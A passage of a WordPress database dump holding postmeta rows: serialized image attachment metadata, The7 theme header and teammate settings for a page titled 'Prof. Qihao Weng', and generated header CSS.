(34793,4963,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:272;s:6:\"height\";i:370;s:4:\"file\";s:24:\"2023/06/ayman_elzagh.jpg\";s:8:\"filesize\";i:14475;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"ayman_elzagh-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10315;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"ayman_elzagh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5097;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34794,4971,'_edit_lock','1690906216:1'),
(34795,4972,'_wp_attached_file','2023/07/phd-qihao-e1688947982158.png'),
(34796,4972,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:142;s:6:\"height\";i:182;s:4:\"file\";s:36:\"2023/07/phd-qihao-e1688947982158.png\";s:8:\"filesize\";i:74127;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"phd-qihao-e1688947982158-142x150.png\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39558;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34797,4971,'_thumbnail_id','4972'),
(34798,4971,'_edit_last','1'),
(34799,4971,'_dt_sidebar_position','disabled'),
(34800,4971,'_dt_sidebar_widgetarea_id','sidebar_1'),
(34801,4971,'_dt_sidebar_hide_on_mobile','0'),
(34802,4971,'_dt_footer_show','1'),
(34803,4971,'_dt_footer_widgetarea_id','sidebar_2'),
(34804,4971,'_dt_footer_hide_on_mobile','0'),
(34805,4971,'_dt_header_title','fancy'),
(34806,4971,'_dt_header_background','normal'),
(34807,4971,'_dt_header_background_below_slideshow','disabled'),
(34808,4971,'_dt_header_transparent_bg_color_scheme','light'),
(34809,4971,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(34810,4971,'_dt_header_transparent_top_bar_bg_opacity','25'),
(34811,4971,'_dt_header_transparent_bg_color','#000000'),
(34812,4971,'_dt_header_transparent_bg_opacity','50'),
(34813,4971,'_dt_header_disabled_background','normal'),
(34814,4971,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(34815,4971,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(34816,4971,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(34817,4971,'_dt_header_disabled_transparent_bg_color','#000000'),
(34818,4971,'_dt_header_disabled_transparent_bg_opacity','50'),
(34819,4971,'_dt_page_overrides_top_margin',''),
(34820,4971,'_dt_page_overrides_right_margin',''),
(34821,4971,'_dt_page_overrides_bottom_margin',''),
(34822,4971,'_dt_page_overrides_left_margin',''),
(34823,4971,'_dt_mobile_page_padding_top',''),
(34824,4971,'_dt_mobile_page_padding_right',''),
(34825,4971,'_dt_mobile_page_padding_bottom',''),
(34826,4971,'_dt_mobile_page_padding_left',''),
(34827,4971,'_dt_fancy_header_layout_heading',''),
(34828,4971,'_dt_fancy_header_title_aligment','center'),
(34829,4971,'_dt_fancy_header_height','300'),
(34830,4971,'_dt_fancy_header_padding-top','0px'),
(34831,4971,'_dt_fancy_header_padding-bottom','0px'),
(34832,4971,'_dt_fancy_header_breadcrumbs_heading',''),
(34833,4971,'_dt_fancy_header_breadcrumbs','disabled'),
(34834,4971,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34835,4971,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34836,4971,'_dt_fancy_header_title_heading',''),
(34837,4971,'_dt_fancy_header_title_mode','custom'),
(34838,4971,'_dt_fancy_header_title','Prof. Qihao Weng'),
(34839,4971,'_dt_fancy_header_title_font_size','30'),
(34840,4971,'_dt_fancy_header_title_line_height','36'),
(34841,4971,'_dt_fancy_header_text_transform','none'),
(34842,4971,'_dt_fancy_header_title_color_mode','color'),
(34843,4971,'_dt_fancy_header_title_color','#ffffff'),
(34844,4971,'_dt_fancy_header_subtitle_heading',''),
(34845,4971,'_dt_fancy_header_subtitle',''),
(34846,4971,'_dt_fancy_header_subtitle_font_size','18'),
(34847,4971,'_dt_fancy_header_subtitle_line_height','26'),
(34848,4971,'_dt_fancy_header_subtitle_text_transform','none'),
(34849,4971,'_dt_fancy_header_subtitle_color_mode','color'),
(34850,4971,'_dt_fancy_header_subtitle_color','#ffffff'),
(34851,4971,'_dt_fancy_header_bg_heading',''),
(34852,4971,'_dt_fancy_header_bg_color','#222222'),
(34853,4971,'_dt_fancy_header_bg_image_origin','custom'),
(34854,4971,'_dt_fancy_header_bg_image','a:0:{}'),
(34855,4971,'_dt_fancy_header_bg_repeat','no-repeat'),
(34856,4971,'_dt_fancy_header_bg_position_x','center'),
(34857,4971,'_dt_fancy_header_bg_position_y','center'),
(34858,4971,'_dt_fancy_header_bg_fullscreen','1'),
(34859,4971,'_dt_fancy_header_bg_overlay','0'),
(34860,4971,'_dt_fancy_header_overlay_color','#000'),
(34861,4971,'_dt_fancy_header_bg_overlay_opacity','50'),
(34862,4971,'_dt_fancy_header_scroll_effect','default'),
(34863,4971,'_dt_fancy_header_bg_parallax','0.5'),
(34864,4971,'_dt_fancy_header_responsiveness_heading',''),
(34865,4971,'_dt_fancy_header_responsiveness','disabled'),
(34866,4971,'_dt_fancy_header_responsiveness_switch','778px'),
(34867,4971,'_dt_fancy_header_responsive_height','70'),
(34868,4971,'_dt_fancy_header_responsive_font_size','30'),
(34869,4971,'_dt_fancy_header_responsive_title_line_height','38'),
(34870,4971,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34871,4971,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34872,4971,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34873,4971,'_dt_teammate_options_go_to_single','1'),
(34874,4971,'_dt_teammate_options_position',''),
(34875,4971,'_dt_teammate_options_website',''),
(34876,4971,'_dt_teammate_options_mail',''),
(34877,4971,'_dt_teammate_options_facebook',''),
(34878,4971,'_dt_teammate_options_twitter',''),
(34879,4971,'_dt_teammate_options_dribbble',''),
(34880,4971,'_dt_teammate_options_you-tube',''),
(34881,4971,'_dt_teammate_options_rss',''),
(34882,4971,'_dt_teammate_options_delicious',''),
(34883,4971,'_dt_teammate_options_flickr',''),
(34884,4971,'_dt_teammate_options_lastfm',''),
(34885,4971,'_dt_teammate_options_linkedin',''),
(34886,4971,'_dt_teammate_options_vimeo',''),
(34887,4971,'_dt_teammate_options_tumbler',''),
(34888,4971,'_dt_teammate_options_pinterest',''),
(34889,4971,'_dt_teammate_options_devian',''),
(34890,4971,'_dt_teammate_options_skype',''),
(34891,4971,'_dt_teammate_options_github',''),
(34892,4971,'_dt_teammate_options_instagram',''),
(34893,4971,'_dt_teammate_options_stumbleupon',''),
(34894,4971,'_dt_teammate_options_behance',''),
(34895,4971,'_dt_teammate_options_px-500',''),
(34896,4971,'_dt_teammate_options_tripedvisor',''),
(34897,4971,'_dt_teammate_options_vk',''),
(34898,4971,'_dt_teammate_options_foursquare',''),
(34899,4971,'_dt_teammate_options_xing',''),
(34900,4971,'_dt_teammate_options_weibo',''),
(34901,4971,'_dt_teammate_options_odnoklassniki',''),
(34902,4971,'_dt_teammate_options_research-gate',''),
(34903,4971,'_dt_teammate_options_yelp',''),
(34904,4971,'_dt_teammate_options_blogger',''),
(34905,4971,'_dt_teammate_options_soundcloud',''),
(34906,4971,'_dt_teammate_options_viber',''),
(34907,4971,'_dt_teammate_options_whatsapp',''),
(34908,4971,'_dt_teammate_options_reddit',''),
(34909,4971,'_dt_teammate_options_snapchat',''),
(34910,4971,'_dt_teammate_options_telegram',''),
(34911,4971,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34912,4971,'_oembed_94e0c3f45d03d5e761317767cb653bf7','{{unknown}}'),
(34913,4971,'_oembed_4a6fbf7a0d926f282a17178f13e42404','{{unknown}}'),
(34914,4972,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:153;s:6:\"height\";i:228;s:4:\"file\";s:13:\"phd-qihao.png\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:21:\"phd-qihao-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40470;}}'),
(34915,4987,'_wp_attached_file','2023/07/image.png'),
(34916,4987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:448;s:6:\"height\";i:153;s:4:\"file\";s:17:\"2023/07/image.png\";s:8:\"filesize\";i:18201;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"image-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16557;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34917,4990,'_wp_attached_file','2023/07/image002.jpg'),
(34918,4990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:190;s:4:\"file\";s:20:\"2023/07/image002.jpg\";s:8:\"filesize\";i:7359;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"image002-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34919,5002,'_wp_attached_file','2023/07/logo.jpg'),
(34920,5002,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:850;s:6:\"height\";i:850;s:4:\"file\";s:16:\"2023/07/logo.jpg\";s:8:\"filesize\";i:1126092;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28279;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10445;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"logo-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98063;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"logo-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56650;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"logo-800x800.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102772;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34921,5005,'_wp_attached_file','2023/07/aboquir.png'),
(34922,5005,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1036;s:6:\"height\";i:1299;s:4:\"file\";s:19:\"2023/07/aboquir.png\";s:8:\"filesize\";i:471383;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"aboquir-239x300.png\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49943;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"aboquir-817x1024.png\";s:5:\"width\";i:817;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:400384;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"aboquir-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23342;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"aboquir-768x963.png\";s:5:\"width\";i:768;s:6:\"height\";i:963;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:357412;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"aboquir-500x627.png\";s:5:\"width\";i:500;s:6:\"height\";i:627;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:169561;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:20:\"aboquir-800x1003.png\";s:5:\"width\";i:800;s:6:\"height\";i:1003;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:387301;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34923,5009,'_wp_attached_file','2023/07/ntra.jpg'),
(34924,5009,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1974;s:6:\"height\";i:764;s:4:\"file\";s:16:\"2023/07/ntra.jpg\";s:8:\"filesize\";i:153410;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ntra-300x116.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10196;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"ntra-1024x396.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:396;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46530;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ntra-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5024;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"ntra-768x297.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33283;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:17:\"ntra-1536x594.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:594;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75744;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"ntra-500x194.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19765;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:16:\"ntra-800x310.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34530;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:17:\"ntra-1280x495.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61504;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:17:\"ntra-1920x743.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:743;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97974;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34926,5033,'_wp_attached_file','2023/07/ramsis.webp'),
(34927,5033,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:582;s:6:\"height\";i:463;s:4:\"file\";s:19:\"2023/07/ramsis.webp\";s:8:\"filesize\";i:26682;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"ramsis-300x239.webp\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11398;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"ramsis-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4628;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"ramsis-500x398.webp\";s:5:\"width\";i:500;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24352;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34928,5039,'_wp_attached_file','2023/07/LOGO-FINAL-scaled.jpg'),
(34929,5039,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:2048;s:4:\"file\";s:29:\"2023/07/LOGO-FINAL-scaled.jpg\";s:8:\"filesize\";i:159950;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"LOGO-FINAL-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8419;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL-1024x819.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:819;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39586;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"LOGO-FINAL-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4244;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"LOGO-FINAL-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26724;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL-1536x1229.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1229;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71563;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL-2048x1638.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1638;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111011;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:22:\"LOGO-FINAL-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16229;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:22:\"LOGO-FINAL-800x640.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27664;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL-1280x1024.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54285;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL-1920x1536.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101643;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"LOGO-FINAL.jpg\";}'),
(34930,5041,'_wp_attached_file','2023/07/LOGO-FINAL2.jpg'),
(34931,5041,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2379;s:6:\"height\";i:1461;s:4:\"file\";s:23:\"2023/07/LOGO-FINAL2.jpg\";s:8:\"filesize\";i:439612;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL2-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10164;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL2-1024x629.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:629;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45915;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6397;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL2-768x472.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL2-1536x943.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:943;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81806;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"LOGO-FINAL2-2048x1258.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120434;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL2-500x307.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19013;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"LOGO-FINAL2-800x491.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:491;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33240;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:24:\"LOGO-FINAL2-1280x786.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:786;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62682;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:25:\"LOGO-FINAL2-1920x1179.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1179;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34932,4495,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:714;s:6:\"height\";i:412;s:4:\"file\";s:12:\"egyptair.png\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:20:\"egyptair-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18634;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:20:\"egyptair-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31662;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:20:\"egyptair-500x289.png\";s:5:\"width\";i:500;s:6:\"height\";i:289;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77955;}}'),
(34933,5053,'_wp_attached_file','2023/07/5X5cm-PIESAT-Logo.png'),
